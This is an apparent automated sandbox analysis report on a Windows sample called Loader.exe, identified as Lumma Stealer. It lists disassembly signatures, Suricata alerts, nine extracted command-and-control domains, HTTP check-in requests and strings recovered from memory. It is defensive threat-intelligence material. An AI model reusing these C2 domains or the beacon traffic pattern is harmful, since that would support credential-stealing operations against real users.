    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx3_2_00445B20
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp dword ptr [0044EF6Ch]3_2_0042CBDC
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]3_2_00406B90
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h3_2_0042CC28
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], FFFF4170h3_2_00446C30
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+312BE668h]3_2_00440CC0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 7B3AFDABh3_2_00440CC0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then lea eax, dword ptr [esp+48h]3_2_0042AD00
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx3_2_00445E70
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]3_2_0043EE00
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 53F09CFAh3_2_0041EE2E
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h3_2_0041EE2E
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h3_2_0041EE2E
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], C59B8BCBh3_2_00446F00
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebp, word ptr [eax]3_2_00446F00

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2056572 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (widdensmoywi .sbs) : 192.168.2.6:55988 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056566 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs) : 192.168.2.6:50381 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056568 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs) : 192.168.2.6:53786 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056564 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs) : 192.168.2.6:50222 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056570 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs) : 192.168.2.6:64493 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056573 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (widdensmoywi .sbs in TLS SNI) : 192.168.2.6:49710 -> 104.21.8.37:443
    Source: Network trafficSuricata IDS: 2056567 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI) : 192.168.2.6:49715 -> 104.21.33.249:443
    Source: Network trafficSuricata IDS: 2056560 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs) : 192.168.2.6:63149 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056562 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs) : 192.168.2.6:51843 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056558 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs) : 192.168.2.6:58354 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056565 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI) : 192.168.2.6:49718 -> 172.67.205.156:443
    Source: Network trafficSuricata IDS: 2056559 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI) : 192.168.2.6:49732 -> 104.21.79.35:443
    Source: Network trafficSuricata IDS: 2056571 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI) : 192.168.2.6:49713 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2056556 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs) : 192.168.2.6:50135 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056561 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI) : 192.168.2.6:49721 -> 172.67.173.224:443
    Source: Network trafficSuricata IDS: 2056563 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI) : 192.168.2.6:49720 -> 172.67.140.193:443
    Source: Network trafficSuricata IDS: 2056557 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI) : 192.168.2.6:49738 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49713 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49713 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49710 -> 104.21.8.37:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 104.21.8.37:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49715 -> 104.21.33.249:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49715 -> 104.21.33.249:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49720 -> 172.67.140.193:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49720 -> 172.67.140.193:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49718 -> 172.67.205.156:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49718 -> 172.67.205.156:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49721 -> 172.67.173.224:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49721 -> 172.67.173.224:443
    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49744 -> 104.102.49.254:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49738 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49738 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49755 -> 172.67.206.204:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49755 -> 172.67.206.204:443
    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49761 -> 172.67.206.204:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49732 -> 104.21.79.35:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49732 -> 104.21.79.35:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49761 -> 172.67.206.204:443
    Source: Malware configuration extractorURLs: condifendteu.sbs
    Source: Malware configuration extractorURLs: resinedyw.sbs
    Source: Malware configuration extractorURLs: drawwyobstacw.sbs
    Source: Malware configuration extractorURLs: enlargkiw.sbs
    Source: Malware configuration extractorURLs: ehticsprocw.sbs
    Source: Malware configuration extractorURLs: allocatinow.sbs
    Source: Malware configuration extractorURLs: vennurviot.sbs
    Source: Malware configuration extractorURLs: mathcucom.sbs
    Source: Malware configuration extractorURLs: widdensmoywi.sbs
    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: widdensmoywi.sbs
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mathcucom.sbs
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: enlargkiw.sbs
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resinedyw.sbs
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vennurviot.sbs
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ehticsprocw.sbs
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condifendteu.sbs
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawwyobstacw.sbs
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=P9r_mXsInYaSCDFf.Rj_aAUYNGZ0HMdPID1gWzVfqGI-1728765372-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: sergei-esenin.com
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: widdensmoywi.sbs
    Source: global trafficDNS traffic detected: DNS query: mathcucom.sbs
    Source: global trafficDNS traffic detected: DNS query: allocatinow.sbs
    Source: global trafficDNS traffic detected: DNS query: enlargkiw.sbs
    Source: global trafficDNS traffic detected: DNS query: resinedyw.sbs
    Source: global trafficDNS traffic detected: DNS query: vennurviot.sbs
    Source: global trafficDNS traffic detected: DNS query: ehticsprocw.sbs
    Source: global trafficDNS traffic detected: DNS query: condifendteu.sbs
    Source: global trafficDNS traffic detected: DNS query: drawwyobstacw.sbs
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: sergei-esenin.com
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: widdensmoywi.sbs
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: Loader.exe, 00000003.00000003.2178667434.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2169209036.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2178802585.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allocatinow.sbs/
    Source: Loader.exe, 00000003.00000003.2169209036.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allocatinow.sbs/api
    Source: Loader.exe, 00000003.00000003.2169209036.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allocatinow.sbs/apis
    Source: Loader.exe, 00000003.00000003.2169209036.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allocatinow.sbs/piP
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: Loader.exe, 00000003.00000003.2178667434.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2178802585.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enlargkiw.sbs/
    Source: Loader.exe, 00000003.00000003.2178667434.0000000000D46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enlargkiw.sbs/1w#U
    Source: Loader.exe, 00000003.00000003.2178667434.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2178802585.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enlargkiw.sbs/api
    Source: Loader.exe, 00000003.00000003.2178667434.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2178802585.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enlargkiw.sbs/api%U
    Source: Loader.exe, 00000003.00000003.2178667434.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2178802585.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enlargkiw.sbs/apibs-
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
    Source: Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/
    Source: Loader.exe, 00000003.00000003.2169209036.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/api
    Source: Loader.exe, 00000003.00000003.2169209036.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathcucom.sbs/api4
    Source: Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resinedyw.sbs/
